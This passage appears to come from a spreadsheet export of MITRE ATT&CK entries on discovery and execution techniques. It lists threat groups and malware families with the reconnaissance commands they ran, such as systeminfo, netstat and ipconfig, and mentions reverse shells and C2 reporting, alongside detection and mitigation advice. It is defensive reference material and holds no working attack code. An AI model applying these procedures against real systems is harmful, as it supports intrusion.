    <t>[[Group/G0059|Magic Hound]] malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0130|Unknown Logger]] can obtain information about the victim computer name, physical memory, country, and date.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has run &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;systeminfo&lt;/code&gt; on a victim.[[CiteRef::Palo Alto OilRig May 2016]][[CiteRef::Palo Alto OilRig Oct 2016]]</t>
  </si>
  <si>
    <t>checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.[[CiteRef::Microsoft SIR Vol 21]]</t>
  </si>
  <si>
    <t>[[Software/S0065|4H RAT]] sends an OS version identifier in its beacons.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] collected the victim computer name, OS version, and architecture type and sent the information to its C2 server .[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Software/S0059|WinMM]] collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0060|Sys10]] collects the computer name, OS versioning information, and OS install date and sends the information to the C2.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0058|SslMM]] sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0093|Backdoor.Oldrea]] collects information about the OS, computer name, and Internet adapter configuration.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the machine and operating system.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>The initial beacon packet for [[Software/S0085|S-Type]] contains the operating system version and file system of the victim.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>The initial beacon packet for [[Software/S0084|Mis-Type]] contains the operating system version and file system of the victim.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0142|StreamEx]] has the ability to enumerate system information.[[CiteRef::Cylance Shell Crew Feb 2017]]</t>
  </si>
  <si>
    <t>collects the victim host name and serial number, and then sends the information to the C2 server.[[CiteRef::ClearSky Charming Kitten Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0086|ZLib]] has the ability to enumerate system information.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.[[CiteRef::US-CERT FALLCHILL Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] performs operating system information discovery using &lt;code&gt;systeminfo&lt;/code&gt; commands.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>Several [[Group/G0032|Lazarus Group]] malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information.[[CiteRef::Novetta Blockbuster Destructive Malware]][[CiteRef::Novetta Blockbuster Loaders]]</t>
  </si>
  <si>
    <t>can gather system information from a victim.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0151|HALFBAKED]] can obtain information about the OS, processor, and BIOS.[[CiteRef::FireEye FIN7 April 2017]]</t>
  </si>
  <si>
    <t>The initial beacon packet for [[Software/S0083|Misdat]] contains the operating system version of the victim.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>collects the victim username and sends it to the C2 server.[[CiteRef::ClearSky Charming Kitten Dec 2017]]</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net use&lt;/code&gt; and &lt;code&gt;net session&lt;/code&gt; can be used in [[Software/S0039|Net]] to gather information about network connections from a particular host.[[CiteRef::Savill 1999]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used &lt;code&gt;netstat -an&lt;/code&gt; on a victim to get a listing of network connections.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>Software: netstat, netstat.exe</t>
  </si>
  <si>
    <t>[[Software/S0104|netstat]] can be used to enumerate local network connections, including active TCP connections and other network statistics.[[CiteRef::TechNet Netstat]]</t>
  </si>
  <si>
    <t>[[Group/G0018|admin@338]] actors used the following command following exploitation of a machine with [[Software/S0042|LOWBALL]] malware to display network connections: &lt;code&gt;netstat -ano &gt;&gt; %temp%\download&lt;/code&gt;[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used &lt;code&gt;net use&lt;/code&gt; to conduct connectivity checks to machines.[[CiteRef::PWC Cloud Hopper April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can obtain a list of active connections and open ports.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0033|Poseidon Group]] obtains and saves information about victim network interfaces and addresses.[[CiteRef::Kaspersky Poseidon Group]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] has gathered information about local network connections using [[Software/S0104|netstat]].[[CiteRef::F-Secure BlackEnergy 2014]][[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can enumerate drives and Remote Desktop sessions.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may collect active network connections by running &lt;code&gt;netstat -an&lt;/code&gt; on a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] performs local network connection discovery using &lt;code&gt;netstat -ano&lt;/code&gt; commands.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that can enumerate current network connections.[[CiteRef::Symantec Buckeye]][[CiteRef::FireEye Clandestine Fox]] [[CiteRef::evolution of pirpi]]</t>
  </si>
  <si>
    <t>[[Software/S0063|SHOTPUT]] uses [[Software/S0104|netstat]] to list TCP connection status.[[CiteRef::Palo Alto CVE-2015-3113 July 2015]]</t>
  </si>
  <si>
    <t>enumerates the current network connections similar to &lt;code&gt; net use &lt;/code&gt; [[CiteRef::Symantec Buckeye]].</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has used &lt;code&gt;net use&lt;/code&gt; to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>collects the current username and sends it to the C2 server.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware gathers the registered user and primary owner name via WMI.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can obtain the victim username and permissions.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0018|admin@338]] actors used the following command after exploiting a machine with [[Software/S0042|LOWBALL]] malware to acquire information about local networks: &lt;code&gt;ipconfig /all &gt;&gt; %temp%\download&lt;/code&gt;[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] collected the victim username and whether it was running as admin, then sent the information to its C2 server.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] surveys a system upon check-in to discover information in the Windows Registry with the &lt;code&gt;reg query&lt;/code&gt; command.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] obtains the current user's security identifier.[[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can obtain information about the current user.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] surveys a system upon check-in to discover active local network connections using the &lt;code&gt;netstat -an&lt;/code&gt;, &lt;code&gt;net use&lt;/code&gt;, &lt;code&gt;net file&lt;/code&gt;, and &lt;code&gt;net session&lt;/code&gt; commands.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>[[Software/S0102|nbtstat]] can be used to discover current NetBIOS sessions.</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Command-Line Interface</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] can execute commands from its C2 server.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. ,</t>
  </si>
  <si>
    <t>Audit and/or block command-line interpreters by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Administrator,SYSTEM,User</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1059</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;net stop&lt;/code&gt; commands can be used in [[Software/S0039|Net]] to execute or stop Windows services.[[CiteRef::Savill 1999]]</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [[Software/S0029|PsExec]]. ,</t>
  </si>
  <si>
    <t>Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level. Also ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.
Identify unnecessary system utilities or potentially malicious software that may be used to interact with Windows services,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1035</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] is capable of creating a remote Bash shell and executing commands.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] uses the command-line interface.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used the command-line interface for execution.[[CiteRef::FireEye APT34 Dec 2017]][[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0156|KOMPROGO]] is capable of creating a reverse shell.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0158|PHOREAL]] is capable of creating reverse shell.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] uses a command-line interface to interact with systems.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>Adversaries can direct [[Software/S0031|BACKSPACE]] to execute from the command-line on infected hosts, or have [[Software/S0031|BACKSPACE]] create a reverse shell.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] can provide a remote shell.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>can execute commands on victims.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used a command-line interface for execution.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] is capable of executing commands via cmd.exe.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0032|gh0st]] RAT is able to open a command shell.[[CiteRef::FireEye Hacking Team]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] ran a reverse shell with Meterpreter.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Software/S0159|SNUGRIDE]] is capable of executing commands and spawning a reverse shell.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0106|cmd]] is used to execute programs and other actions at the command-line interface.[[CiteRef::TechNet Cmd]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands.[[CiteRef::PWC Cloud Hopper April 2017]][[CiteRef::PWC Cloud Hopper Technical Annex April 2017]][[CiteRef::Github AD-Pentest-Script]]</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] allows actors to spawn a reverse shell on a victim.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can receive and execute commands with cmd.exe.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]] It can also provide a reverse shell.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0068|httpclient]] opens cmd.exe on the victim.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Group/G0028|Threat Group-1314]] actors spawned shells on remote systems on a victim network to execute commands.[[CiteRef::Dell TG-1314]]</t>
  </si>
  <si>
    <t>Several tools used by [[Group/G0039|Suckfly]] have been command-line driven.[[CiteRef::Symantec Suckfly May 2016]]</t>
  </si>
  <si>
    <t>Software: China Chopper</t>
  </si>
  <si>
    <t>[[Software/S0020|China Chopper]] is capable of opening a command terminal.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]] is capable of spawning a reverse shell on a victim.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] uses the command line and rundll32.exe to execute.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0065|4H RAT]] has the capability to create a remote shell.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Software/S0077|CallMe]] has the capability to create a reverse shell on victims.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>uses command line for execution.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>has used command line during its intrusions.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] has used the command-line interface.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>provides a reverse shell on the victim.[[CiteRef::ClearSky Wilted Tulip July 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has used command-line interfaces for execution.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0142|StreamEx]] has the ability to remotely execute commands.[[CiteRef::Cylance Shell Crew Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0080|Mivast]] has the capability to open a remote shell and run basic commands.[[CiteRef::Symantec Backdoor.Mivast]]</t>
  </si>
  <si>
    <t>[[Software/S0187|Daserf]] can execute shell commands.[[CiteRef::Trend Micro Daserf Nov 2017]][[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>uses the command line.[[CiteRef::ClearSky Charming Kitten Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0004|TinyZBot]] supports execution from the command-line.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>[[Software/S0074|Sakula]] calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. [[Software/S0074|Sakula]] also has the capability to invoke a reverse shell.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>Malware used by [[Group/G0004|Ke3chang]] can run commands on the command-line interface.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] can execute commands on the victim.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware uses cmd.exe to execute commands on victims.[[CiteRef::Novetta Blockbuster Destructive Malware]]</t>
  </si>
  <si>
    <t>[[Software/S0082|Emissary]] has the capability to create a remote shell and execute specified commands.[[CiteRef::Lotus Blossom Dec 2015]]</t>
  </si>
  <si>
    <t>can execute commands.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] uses cmd.exe to run commands for enumerating the host.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0083|Misdat]] is capable of providing shell functionality to the attacker to execute commands.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0146|TEXTMATE]] executes cmd.exe to provide  a reverse shell to attackers.[[CiteRef::FireEye FIN7 March 2017]][[CiteRef::Cisco DNSMessenger March 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0086|ZLib]] has the ability to execute shell commands.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>Software: PsExec</t>
  </si>
  <si>
    <t>Microsoft Sysinternals [[Software/S0029|PsExec]] is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.[[CiteRef::Russinovich Sysinternals]]</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>The &lt;code&gt;source&lt;/code&gt; command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways &lt;code&gt;source /path/to/filename [arguments]&lt;/code&gt; or &lt;code&gt;. /path/to/filename [arguments]&lt;/code&gt;. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment. 
Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</t>
  </si>
  <si>
    <t>Process Monitoring,File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring. ,</t>
  </si>
  <si>
    <t>Due to potential legitimate uses of source commands, it's may be difficult to mitigate use of this technique.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1153</t>
  </si>
  <si>
    <t>uses services.exe to register a new autostart service named "Audit Service" using a copy of the local lsass.exe file.[[CiteRef::Microsoft SIR Vol 21]][[CiteRef::Microsoft Wingbird Nov 2017]]</t>
  </si>
  <si>
    <t>Execution through Module Load</t>
  </si>
  <si>
    <t>The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API.[[CiteRef::Wikipedia Windows Library Files]]
The module loader can load DLLs:
*via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
*via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
*via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
*via &lt;code&gt;&lt;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&gt;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries can use this functionality as a way to execute arbitrary code on a system.</t>
  </si>
  <si>
    <t>Process Monitoring,API monitoring,File monitoring,DLL monitoring</t>
  </si>
  <si>
    <t>Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths. 
Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior. ,</t>
  </si>
  <si>
    <t>Directly mitigating module loads and API calls related to module loads will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying and correlated subsequent behavior to determine if it is the result of malicious activity.</t>
  </si>
  <si>
    <t>Stefan Kanthak</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1129</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE is still enabled in Windows 10 and most of Microsoft Office 2016 (a December 2017 patch created a Registry key that disables DDE in Word by default).[[CiteRef::BleepingComputer DDE Disabled in Word Dec 2017]]
Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands[[CiteRef::SensePost PS DDE May 2016]][[CiteRef::Kettle CSV DDE Aug 2014]] and used to deliver execution via spear phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.[[CiteRef::SensePost MacroLess DDE Oct 2017]] DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,Process Monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>OLE and Office Open XML files can be scanned for ?DDEAUTO', ?DDE?, and other strings indicative of DDE execution.[[CiteRef::NVisio Labs DDE Detection Oct 2017]]
Monitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.
Monitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications. ,</t>
  </si>
  <si>
    <t>Ensure Protected View is enabled.[[CiteRef::Microsoft Protected View]]
Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution.[[CiteRef::Microsoft DDE Advisory Nov 2017]][[CiteRef::BleepingComputer DDE Disabled in Word Dec 2017]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1173</t>
  </si>
  <si>
    <t>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms.[[CiteRef::Wikipedia Command-Line Interface]] One example command-line interface on Windows systems is [[Software/S0106|cmd]], which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [[Technique/T1053|Scheduled Task]]).
Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] used WMI to steal credentials and execute backdoors at a future time.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior.[[CiteRef::FireEye WMI 2015]] ,</t>
  </si>
  <si>
    <t>Disabling WMI or RPCS may cause system instability and should be evaluated to assess the impact to a network.  By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts.[[CiteRef::FireEye WMI 2015]]</t>
  </si>
  <si>
    <t>WMI service, winmgmt, running.
Host/network firewalls allowing SMB and WMI ports from source to destination.
SMB authentication.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1047</t>
  </si>
  <si>
    <t>[[Software/S0156|KOMPROGO]] is capable of running WMI queries.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>The [[Group/G0009|Deep Panda]] group is known to utilize WMI for lateral movement.[[CiteRef::Alperovitch 2014]]</t>
  </si>
  <si>
    <t>Execution through API</t>
  </si>
  <si>
    <t>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.[[CiteRef::Microsoft CreateProcess]]
Additional Windows API calls that can be used to execute binaries include:[[CiteRef::Kanthak Verifier]]
*CreateProcessA() and CreateProcessW(),
*CreateProcessAsUserA() and CreateProcessAsUserW(),
*CreateProcessInternalA() and CreateProcessInternalW(),
*CreateProcessWithLogonW(), CreateProcessWithTokenW(),
*LoadLibraryA() and LoadLibraryW(),
*LoadLibraryExA() and LoadLibraryExW(),
*LoadModule(),
*LoadPackagedLibrary(),
*WinExec(),
*ShellExecuteA() and ShellExecuteW(),
*ShellExecuteExA() and ShellExecuteExW()</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows API functions such as CreateProcess are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. ,</t>
  </si>
  <si>
    <t>Mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior. Audit and/or block potentially malicious software by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1106</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used WMI for execution.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can use WMI to deliver a payload to a remote host.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may use WMI when collecting information about a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>A [[Software/S0089|BlackEnergy]] 2  plug-in uses WMI to gather victim host details.[[CiteRef::Securelist BlackEnergy Feb 2015]]</t>
  </si>
  <si>
    <t>The [[Software/S0062|DustySky]] dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>Graphical User Interface</t>
  </si>
  <si>
    <t>Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as [[Technique/T1076|Remote Desktop Protocol]].</t>
  </si>
  <si>
    <t>Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. 
Unknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of [[Legitimate Credentials]] to access remote systems within the network. ,</t>
  </si>
  <si>
    <t>Prevent adversaries from gaining access to credentials through [[Credential Access]] that can be used to log into remote desktop sessions on systems.
Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to log into remote interactive sessions, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] and Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1061</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware gathers system information via Windows Management Instrumentation (WMI).[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.[[CiteRef::TechNet PowerShell]] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. 
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
Administrator permissions are required to use PowerShell to connect to remote systems.
A number of PowerShell-based offensive testing tools are available, including Empire,[[CiteRef::Github PowerShell Empire]] PowerSploit,[[CiteRef::Powersploit]] and PSAttack.[[CiteRef::Github PSAttack]]</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution.[[CiteRef::Malware Archaeology PowerShell Cheat Sheet]] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[[CiteRef::FireEye PowerShell Logging 2016]] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. ,</t>
  </si>
  <si>
